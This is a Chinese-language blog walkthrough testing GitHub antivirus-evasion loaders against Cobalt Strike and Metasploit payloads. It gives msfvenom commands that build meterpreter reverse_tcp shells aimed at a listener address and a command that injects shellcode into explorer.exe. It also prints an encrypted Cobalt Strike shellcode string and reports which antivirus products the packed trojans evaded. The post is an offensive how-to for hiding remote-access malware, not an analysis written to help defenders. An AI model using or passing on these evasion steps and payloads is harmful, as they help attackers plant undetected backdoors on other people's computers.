前言

github上翻一翻看看有没有好的项目，针对免杀的内容，还是挺有趣的。

杀软检测和免杀

杀软的工作原理就是基于特征码检测、关联检测和行为分析。关联分析是基于代码块或者说核心内容，例如shellcode，行为分析基于动态检测，类似于沙箱。静态的免杀一般都是直接对shellcode做增加随机字符混淆，修改特征、增加花指令，加壳等。

GLLLoader

安装gcc环境

https://sourceforge.net/projects/mingw-w64/files/Toolchains%20targetting%20Win64/Personal%20Builds/mingw-builds/8.1.0/threads-win32/seh/x86_64-8.1.0-release-win32-seh-rt_v6-rev0.7z

不要想着直接下载exe，在线安装有问题，解压到安装目录，添加环境变量

gcc -v

安装 nim

https://nim-lang.org/install_windows.html

解压后添加环境变量

使用cs，生成原生木马

启动服务端，客户端创建监听

生成可执行文件，这里选用32位的，64位的免杀马无法上线

生成artifact.exe

python3 ./Gllloader.py

加载器免杀，使用shellcode免杀

以cs原生木马免杀，生成的可执行文件为Green.exe

但是无法上线

使用poweshell上线，做免杀，无法运行脚本,默认状态下win10是禁用powershell。

set-executionpolicy remotesigned

设置为yes即可

Cool免杀平台

项目

https://github.com/Ed1s0nZ/cool

安装go环境

https://golang.google.cn/dl/

添加环境变量

C:\Users\Administrator>go env -w GO111MODULE=on
C:\Users\Administrator>go env -w GOPROXY=https://goproxy.io,direct
C:\Users\Administrator>go install mvdan.cc/garble@latest

执行coolv01.exe

http://127.0.0.1:9000/

到这里其实见过两个版本的，之前有个版本是go实现的，win版的不好使。

Shhhloader免杀

编译好编译但是似乎面临无法上线的问题

使用kali生成bin文件

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.129 LPORT=5555 -f raw -o payload.bin

将payload.bin放在同级目录，运行脚本

python Shhhloader.py

这里选择进程注入的方式

python Shhhloader.py payload.bin -p explorer.exe

执行a.exe，上线如下

没走云沙箱，起码微软是过的，没报毒。

BypassAV

https://github.com/G73st/BypassAV

利用cs生成木马

拿出shellcode，这里对shellcode加密，脚本BypassAV.py为shellcode加密脚本

81246379053153310031533170315631491818182573156314931533173265315331673188315631452022603156314520221231563145202228315631453116268213315631042962402653153315126531533120315631922782593126122662423153312531533164214113153314331533172315331972022093156314520221731563145277278113153316631563145276312831563144315331203117296113153316620831563145292226315631452002421131533169315331742782943156314523231563145113153313826531533151265315331203156319231533125315331642141131533143237315331783119315331081431233153310623531232473119315331722003156314520024711315331693182315631452122933156314520022011315331693156314516315631451131533166315631492702472472512512592052582013153315131533178200253258315631452103153319131563146254318631183181311718318631153183311831832063186297311524019315331513153316526531533151209209209209209318623020731213156317931533151315331653153317531563142181818251265315331492012013187142012013186208181818204208318620931563149315631353153314631533151315331653153319131122512653153316720231861812276315631422022022022042022083186315331912032672353153315131533165315631493153314631563141315331412082653153315120920931873153315120420731862631722631243153315131533165315631443153312021331563142315331411118182653153315131563144315331023117163156314931533103315331911531863156319831533144315331722543153315131533165315631493153312531862752442562653153315131533165265315331512093187192012072083186315631042093153317821131533151315331653156315118269181823931533143311731563104265315331513153317531563163111818315331753153314911181831533170315631453153315131533151315331512692942982053117183153316926127423324431233124315331052113156319731533108152032772523153314531563146315331782733156319931172152432723182274274315331722033119214315331653153319231563143315631091631273156319231563132315631973156317525331563176312225031533120315631733156310931563199102153156313027223531533161205315331581412315331362732453153317131563103315331343156310820127531123186315331253156319531533137182033113318131162632733184318131183117230242299311131223183318031802592692342672602422682553111318531122593117318325031803181235242299204294275242239267260235242209318331183188311131153113242290206242236267265235242209318331182362322352423128236232235242206311631833188318131183117269234267260261214218183115315331053181315331383153310831533161183186249315631041031151623331563144260315631752093153314123027131563146264227315631312413153313331103153316731533105315631042543153317531103153314731533141315631923156316631533179265290315331043153316127331533109311631563161315331473153317925831533135315631313156314021631563134315631453153317931533136315631083153317531533100315631493153316227331533172318231533106315331652532343153317125531563145206215315331392723156310431563134315631763153316727827821531533170315331582222163122315631933182318931533132279213318323531563132315631513153310931533165292315631073153317310315331423156310131533175250203315631482293156319331533125315631412273156316531563125237267173153316926321531533141250311931261529822631563170122592982992302553153316531533101315331712693153310131533171216318131263156316731183156317131563137315331932622032552523156310324931123156310531533135315631762003185315631012093156313626926831153112275214163156315131563102315631353156313331533172315631063156312031563103236315631432131231813156316531533106315331012033153310925431563151204315331992472662483156314331533106315631432283153314531533139315631953153310331533192315631613156314631892163156316518318631533197315631013156317220731533151315331653187276318618217181831861818276182093186200315631762043153317331533151315331653156316931563103181818181131533134201204315631493153317920931861824218182042073186210315631383156314931533172315331513153316531563144315331203117315331463156314519113153314131563144315331203119315331732003153314131533170315631753153310531533151315331512652672652382672362372672382312321818113156314631563178

cs原生马的同一个脚本的加密格式都一样。

使用visual studio重新打包，新建项目

c/c++控制台应用程序，源文件->添加->新建项目

类型为c++

回头看github项目

复制该代码，更改我们自己的shellcode加密内容

修改打包文件类型

重新生成项目

显示如下表示成功

源文件下可以看到exe文件生成

D盾查杀

防火墙没报毒

云沙箱检测

存在检出率，但是可以看出瑞星、卡巴斯基等是可以过的

360安全是可以过的有点儿奇怪吧

不过最严重的问题是目前无法上线，不是能不能过免杀的问题，思路的话可以借鉴。

Shellcode-loader

项目地址

https://github.com/Avienma/shellcode_loader/releases/tag/shellcode_loader

使用msf生成hex编码，使用loader.exe加载

微软防火墙没报毒程序，但是虚拟机直接弹了。自己可以测试，不确定是否有毒。

CS目前未上线。

Gobypass-01

项目地址

https://github.com/4ra1n/GoBypass/releases/tag/0.1

改的国外的项目，原项目地址

https://github.com/Ne0nd0g/go-shellcode

使用msfvenom生成payload

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=1xx.xx.xx.xx LPORT=5555 -f c

跟着操作走就是error

go env -w GO111MODULE=on
go mod download
go run main.go -m CreateThread -d

本地重新部署go环境

https://golang.google.cn/dl/

https://golang.google.cn/dl/go1.18.3.windows-amd64.msi

另外

还具有加壳等功能，但是问题就是编译不成功，我以为是环境问题，更换go为1.17

直接卒

直接整不明白了，回头看原项目，shellcode加密部分如下

那么想一种新思路，将生成的文件做异或然后载重新注入进程

修改main.go,打包

回头看看效果

360、瑞星和微软是可以过的。

意料之外情理之中

尽管目前的项目无法实现免杀，那么学习思路，自己实现并去特征免杀，或者说是改造原有项目去尝试实现免杀。

那么使用Gobypass的shellcode加密在重新加载

这里有了意外，ahhhh！

小结

免杀的思路可以相互借鉴，核心的免杀内容是基于静态或者动态免杀实现的，那么关于项目的打包个人感觉效果还是go的效果大于python或者c的